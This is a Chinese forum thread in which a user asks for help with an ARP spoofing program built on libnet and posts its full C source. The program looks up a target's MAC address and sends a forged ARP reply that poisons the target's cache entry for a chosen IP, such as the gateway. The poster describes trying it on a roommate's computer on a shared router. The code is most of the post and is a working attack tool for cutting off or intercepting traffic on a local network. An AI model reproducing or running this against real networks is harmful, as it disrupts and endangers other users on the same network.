求一個用libnet庫寫的ARP欺騙的例子

nwcfafniw

最近看了UNP第29章，想寫一個ARP欺騙的程序，寫成后拿舍友的電腦來試驗，結(jié)果舍友還能上網(wǎng)，我自己倒不能上網(wǎng)了（我們宿舍四個人用一個路由器），這里把程序貼出來，請大家?guī)臀铱纯�。如果大家之前有寫過這類程序，能在下面貼出來給我參考下是最好不過了。。多謝大家！

1. 
   
2. #include <unp.h>
   
3. #include <libnet.h>
   
4. #include <net/if_arp.h>
   
5. 
   
6. /*
   
7. * argv[1]為欺騙目標(biāo)的IP地址，argv[2]為要修改目標(biāo)主機的ARP表項的IP地址
   
8. * 有了欺騙目標(biāo)的IP地址后，通過訪問ARP緩存來獲得目標(biāo)主機的MAC地址
   
9. * 這是因為目標(biāo)主機通常和我們在同一個網(wǎng)段，我們可以通過ping目標(biāo)主機來獲得目標(biāo)主機IP到目標(biāo)主機MAC地址的ARP表項
   
10. * 舉個例子，當(dāng)輸入 “./arpcheat 192.168.1.100 192.168.1.1” 時，則把主機192.168.1.100的ARP表中的192.168.1.1
    
11. * 對應(yīng)的MAC地址改成 a5:a5:a5:a5:a5:a5
    
12. */
    
13. 
    
14. libnet_t *pnet;
    
15. libnet_ptag_t arptag;
    
16. libnet_ptag_t ethtag;
    
17. 
    
18. int main(int argc, char *argv[])
    
19. {
    
20.     int fd;
    
21.     struct sockaddr_in *sin;
    
22.     struct arpreq arpreq;
    
23.     uint8_t mod[4], h_dest[6], h_mod[6], *ptr;
    
24.     char errbuf[LIBNET_ERRBUF_SIZE];
    
25. 
    
26.     if (argc != 3)
    
27.         err_quit("Usage: arpcheat <dest ip> <modified ip>");
    
28. 
    
29.     /* 通過訪問ARP緩存來獲得目標(biāo)主機的MAC地址 */
    
30.     bzero(&arpreq, sizeof(struct arpreq));
    
31.     sin = (struct sockaddr_in *) &arpreq.arp_pa;
    
32.     sin->sin_family = AF_INET;
    
33.     Inet_pton(AF_INET, argv[1], &sin->sin_addr);
    
34. 
    
35.     fd = Socket(AF_INET, SOCK_DGRAM, 0);
    
36.     strcpy(arpreq.arp_dev, "wlan0");
    
37.     Ioctl(fd, SIOCGARP, &arpreq);
    
38. 
    
39.     /*
    
40.      * mod中存放修改主機的IP，h_dest中存放目標(biāo)主機的MAC地址
    
41.      * h_mod中存入 a5:a5:a5:a5:a5:a5
    
42.      */
    
43.     Inet_pton(AF_INET, argv[2], mod);
    
44.     memcpy(h_dest, &arpreq.arp_ha.sa_data[0], 6);
    
45.     memset(h_mod, 0xa5, 6);
    
46. 
    
47.     /* 初始化libnet */
    
48.     pnet = libnet_init(LIBNET_LINK_ADV, "wlan0", errbuf);
    
49.     if (pnet == NULL)
    
50.         err_quit("Can't initialize libnet: %s", errbuf);
    
51. 
    
52.     /* 構(gòu)造ARP報文 */
    
53.     arptag = libnet_build_arp(
    
54.         1,                           /* 以太網(wǎng)地址類型 */
    
55.         0x0800,                        /* IP地址類型 */
    
56.         6,                        /* 以太網(wǎng)地址長度 */
    
57.         4,                        /* IP地址長度 */
    
58.         ARPOP_REPLY,                /* ARP響應(yīng) */
    
59.         h_mod,                        /* 發(fā)送主機的MAC地址，這里是 a5:a5:a5:a5:a5:a5 */
    
60.         mod,                        /* 發(fā)送主機的IP地址 */
    
61.         h_dest,                        /* 目標(biāo)主機的MAC地址 */
    
62.         (uint8_t *) &sin->sin_addr, /* 目標(biāo)主機的IP地址 */
    
63.         NULL,
    
64.         0,
    
65.         pnet,
    
66.         0);
    
67. 
    
68.     if (arptag == -1)
    
69.         err_quit("arptag error");
    
70.     /* 構(gòu)造以太網(wǎng)頭部 */
    
71.     ethtag = libnet_build_ethernet(
    
72.         h_dest,                        /* 目標(biāo)主機的MAC地址 */
    
73.         h_mod,                        /* 發(fā)送主機的MAC地址 */
    
74.         0x0806,                        /* 以太網(wǎng)幀類型，這里是ARP */
    
75.         NULL,
    
76.         0,
    
77.         pnet,
    
78.         0);
    
79. 
    
80.     if (ethtag == -1)
    
81.         err_quit("ethtag error");
    
82.    
    
83.     /* 寫出以太網(wǎng)幀 */
    
84.     if (libnet_write(pnet) < 0)
    
85.         printf("lost packet\n");
    
86.    
    
87.     libnet_destroy(pnet);
    
88.    
    
89.     return 0;
    
90. }
    

復(fù)制代碼

crazyhadoop

你自己的IP是多少？

nwcfafniw

crazyhadoop 發(fā)表于 2013-11-07 21:33
你自己的IP是多少？

我忘了。。但是我拿來測試的不是自己的IP地址。